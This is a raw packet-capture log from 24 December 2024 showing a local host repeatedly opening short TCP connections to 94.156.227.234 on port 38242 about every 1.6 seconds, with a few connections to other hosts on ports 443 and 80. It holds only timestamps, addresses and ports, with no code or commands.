                                              Dec 24, 2024 05:18:16.636799097 CET6003838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:16.636843920 CET6003838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:16.756355047 CET382426003894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:17.140533924 CET6003838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:17.303656101 CET382426003894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:17.762990952 CET382426003894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:17.763317108 CET6003838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:18.141371965 CET6004038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:18.261004925 CET382426004094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:18.261244059 CET6004038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:18.261393070 CET6004038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:18.380893946 CET382426004094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:18.768004894 CET6004038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:18.929111958 CET382426004094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:19.390917063 CET382426004094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:19.391092062 CET6004038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:19.769566059 CET6004238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:19.889138937 CET382426004294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:19.889647007 CET6004238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:19.889800072 CET6004238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:20.009315014 CET382426004294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:20.395498037 CET6004238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:20.557507038 CET382426004294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:21.015117884 CET382426004294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:21.015336037 CET6004238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:21.396728992 CET6004438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:21.516766071 CET382426004494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:21.516833067 CET6004438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:21.516860008 CET6004438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:21.636385918 CET382426004494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:22.021640062 CET6004438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:22.183573008 CET382426004494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:22.650296926 CET382426004494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:22.650424957 CET6004438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:22.754410028 CET42836443192.168.2.2391.189.91.43
                                              Dec 24, 2024 05:18:23.022628069 CET6004638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:23.142580986 CET382426004694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:23.142674923 CET6004638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:23.142759085 CET6004638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:23.262198925 CET382426004694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:23.647352934 CET6004638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:23.811672926 CET382426004694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:24.263444901 CET382426004694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:24.263535976 CET6004638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:24.648670912 CET6004838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:24.768181086 CET382426004894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:24.768265963 CET6004838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:24.768495083 CET6004838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:24.888573885 CET382426004894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:25.275115967 CET6004838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:25.435566902 CET382426004894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:25.884361029 CET382426004894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:25.884464025 CET6004838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:26.276844978 CET6005038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:26.396389008 CET382426005094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:26.396475077 CET6005038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:26.396579981 CET6005038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:26.518110991 CET382426005094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:26.902842999 CET6005038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:27.067495108 CET382426005094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:27.321788073 CET33606443192.168.2.2354.171.230.55
                                              Dec 24, 2024 05:18:27.441561937 CET4433360654.171.230.55192.168.2.23
                                              Dec 24, 2024 05:18:27.441672087 CET33606443192.168.2.2354.171.230.55
                                              Dec 24, 2024 05:18:27.534617901 CET382426005094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:27.534702063 CET6005038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:27.904119015 CET6005238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:28.024758101 CET382426005294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:28.024831057 CET6005238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:28.024897099 CET6005238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:28.144784927 CET382426005294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:28.534435034 CET6005238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:28.695563078 CET382426005294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:28.897486925 CET4251680192.168.2.23109.202.202.202
                                              Dec 24, 2024 05:18:29.144661903 CET382426005294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:29.144726038 CET6005238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:29.536098003 CET6005438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:29.655658960 CET382426005494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:29.655725002 CET6005438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:29.655833960 CET6005438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:29.775226116 CET382426005494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:30.160783052 CET6005438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:30.327538013 CET382426005494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:30.779531956 CET382426005494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:30.779592991 CET6005438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:31.162198067 CET6005638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:31.281747103 CET382426005694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:31.281816959 CET6005638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:31.281933069 CET6005638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:31.401356936 CET382426005694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:31.786556959 CET6005638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:31.951463938 CET382426005694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:32.412259102 CET382426005694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:32.412331104 CET6005638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:32.787415981 CET6005838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:32.907082081 CET382426005894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:32.907145023 CET6005838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:32.907186031 CET6005838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:33.029840946 CET382426005894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:33.410367966 CET6005838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:33.573128939 CET382426005894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:34.026563883 CET382426005894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:34.026621103 CET6005838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:34.411082029 CET6006038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:34.530747890 CET382426006094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:34.530810118 CET6006038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:34.530838966 CET6006038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:34.651235104 CET382426006094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:35.034406900 CET6006038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:35.199430943 CET382426006094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:35.658077955 CET382426006094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:35.658174038 CET6006038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:36.035249949 CET6006238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:36.154798985 CET382426006294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:36.154854059 CET6006238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:36.154894114 CET6006238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:36.276141882 CET382426006294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:36.660475016 CET6006238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:36.823400974 CET382426006294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:37.281783104 CET382426006294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:37.281861067 CET6006238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:37.661519051 CET6006438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:37.781117916 CET382426006494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:37.781260014 CET6006438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:37.781260014 CET6006438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:37.900754929 CET382426006494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:38.284832001 CET6006438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:38.447489977 CET382426006494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:38.916172981 CET382426006494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:38.916292906 CET6006438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:39.285897970 CET6006638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:39.405806065 CET382426006694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:39.405930042 CET6006638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:39.406162977 CET6006638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:39.525876999 CET382426006694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:39.910314083 CET6006638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:40.075654984 CET382426006694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:40.531282902 CET382426006694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:40.531548977 CET6006638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:40.911518097 CET6006838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:41.030985117 CET382426006894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:41.031101942 CET6006838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:41.031101942 CET6006838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:41.150692940 CET382426006894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:41.535175085 CET6006838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:41.695341110 CET382426006894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:42.167917967 CET382426006894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:42.168221951 CET6006838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:42.536205053 CET6007038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:42.658020020 CET382426007094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:42.658199072 CET6007038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:42.658199072 CET6007038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:42.777784109 CET382426007094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:43.161583900 CET6007038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:43.327651978 CET382426007094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:43.791357994 CET382426007094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:43.791531086 CET6007038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:44.163115025 CET6007238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:44.282651901 CET382426007294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:44.282833099 CET6007238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:44.282833099 CET6007238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:44.402739048 CET382426007294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:44.788364887 CET6007238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:44.951283932 CET382426007294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:45.410662889 CET382426007294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:45.410979986 CET6007238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:45.790106058 CET6007438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:45.909615040 CET382426007494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:45.909781933 CET6007438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:45.909859896 CET6007438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:46.029366016 CET382426007494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:46.419370890 CET6007438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:46.583360910 CET382426007494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:47.040282011 CET382426007494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:47.040502071 CET6007438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:47.420985937 CET6007638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:47.540479898 CET382426007694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:47.540605068 CET6007638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:47.540709019 CET6007638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:47.660263062 CET382426007694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:48.047943115 CET6007638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:48.212845087 CET382426007694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:48.660916090 CET382426007694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:48.661070108 CET6007638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:49.049841881 CET6007838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:49.169471979 CET382426007894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:49.169590950 CET6007838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:49.169681072 CET6007838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:49.289091110 CET382426007894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:49.676803112 CET6007838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:49.839380980 CET382426007894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:50.301878929 CET382426007894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:50.302205086 CET6007838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:50.678486109 CET6008038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:50.800666094 CET382426008094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:50.800867081 CET6008038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:50.800867081 CET6008038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:50.920509100 CET382426008094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:51.307141066 CET6008038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:51.467247009 CET382426008094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:51.921175957 CET382426008094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:51.921371937 CET6008038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:52.309209108 CET6008238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:52.428678989 CET382426008294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:52.428828955 CET6008238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:52.428886890 CET6008238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:52.548381090 CET382426008294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:52.936717987 CET6008238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:53.099275112 CET382426008294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:53.470026970 CET43928443192.168.2.2391.189.91.42
                                              Dec 24, 2024 05:18:53.557090998 CET382426008294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:53.557291985 CET6008238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:53.938283920 CET6008438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:54.057777882 CET382426008494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:54.057888985 CET6008438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:54.057889938 CET6008438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:54.180592060 CET382426008494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:54.563081980 CET6008438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:54.723184109 CET382426008494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:55.178580046 CET382426008494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:55.178817034 CET6008438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:55.564718008 CET6008638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:55.684264898 CET382426008694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:55.684465885 CET6008638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:55.684465885 CET6008638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:55.803937912 CET382426008694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:56.190819979 CET6008638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:56.351207018 CET382426008694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:56.811533928 CET382426008694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:56.811840057 CET6008638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:57.192754030 CET6008838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:57.312217951 CET382426008894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:57.312442064 CET6008838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:57.312442064 CET6008838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:57.432012081 CET382426008894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:57.819541931 CET6008838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:57.979232073 CET382426008894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:58.436878920 CET382426008894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:58.437133074 CET6008838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:58.821235895 CET6009038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:58.940783978 CET382426009094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:58.940907001 CET6009038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:58.941149950 CET6009038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:59.060610056 CET382426009094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:18:59.448152065 CET6009038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:18:59.611319065 CET382426009094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:00.090331078 CET382426009094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:00.090544939 CET6009038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:00.450232029 CET6009238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:00.569806099 CET382426009294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:00.569967985 CET6009238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:00.570015907 CET6009238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:00.689661980 CET382426009294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:01.076483011 CET6009238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:01.239181042 CET382426009294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:01.702457905 CET382426009294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:01.702665091 CET6009238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:02.078690052 CET6009438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:02.199001074 CET382426009494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:02.199151039 CET6009438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:02.199486017 CET6009438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:02.318972111 CET382426009494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:02.706361055 CET6009438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:02.867180109 CET382426009494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:03.312283039 CET382426009494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:03.312477112 CET6009438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:03.708470106 CET6009638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:03.828630924 CET382426009694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:03.828804970 CET6009638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:03.828840971 CET6009638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:03.948363066 CET382426009694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:04.335778952 CET6009638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:04.503129959 CET382426009694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:04.962562084 CET382426009694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:04.962963104 CET6009638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:05.337816000 CET6009838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:05.457590103 CET382426009894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:05.457804918 CET6009838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:05.457870007 CET6009838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:05.577292919 CET382426009894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:05.964778900 CET6009838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:06.127125978 CET382426009894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:06.576942921 CET382426009894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:06.577320099 CET6009838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:06.966931105 CET6010038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:07.086617947 CET382426010094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:07.086960077 CET6010038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:07.086961031 CET6010038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:07.206645966 CET382426010094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:07.592716932 CET6010038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:07.759183884 CET382426010094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:08.207189083 CET382426010094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:08.207489014 CET6010038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:08.594336033 CET6010238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:08.713848114 CET382426010294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:08.714096069 CET6010238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:08.714096069 CET6010238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:08.833600998 CET382426010294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:09.219254017 CET6010238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:09.380543947 CET382426010294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:09.841589928 CET382426010294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:09.841913939 CET6010238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:10.221079111 CET6010438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:10.340748072 CET382426010494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:10.340996981 CET6010438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:10.341056108 CET6010438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:10.463982105 CET382426010494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:10.845519066 CET6010438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:11.011194944 CET382426010494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:11.476237059 CET382426010494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:11.476418972 CET6010438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:11.846998930 CET6010638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:11.966484070 CET382426010694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:11.966675043 CET6010638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:11.966845989 CET6010638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:12.086332083 CET382426010694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:12.471637964 CET6010638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:12.635023117 CET382426010694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:13.090092897 CET382426010694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:13.090337992 CET6010638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:13.472660065 CET6010838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:13.593997955 CET382426010894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:13.594249010 CET6010838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:13.594249010 CET6010838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:13.714143991 CET382426010894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:13.946835995 CET42836443192.168.2.2391.189.91.43
                                              Dec 24, 2024 05:19:14.097729921 CET6010838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:14.262991905 CET382426010894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:14.714991093 CET382426010894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:14.715132952 CET6010838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:15.099292040 CET6011038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:15.219069004 CET382426011094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:15.219285011 CET6011038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:15.219285011 CET6011038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:15.338960886 CET382426011094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:15.723022938 CET6011038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:15.883001089 CET382426011094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:16.347862959 CET382426011094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:16.348124981 CET6011038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:16.724286079 CET6011238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:16.843935013 CET382426011294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:16.844002962 CET6011238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:16.844027996 CET6011238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:16.963836908 CET382426011294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:17.348347902 CET6011238242192.168.2.2394.156.227.234
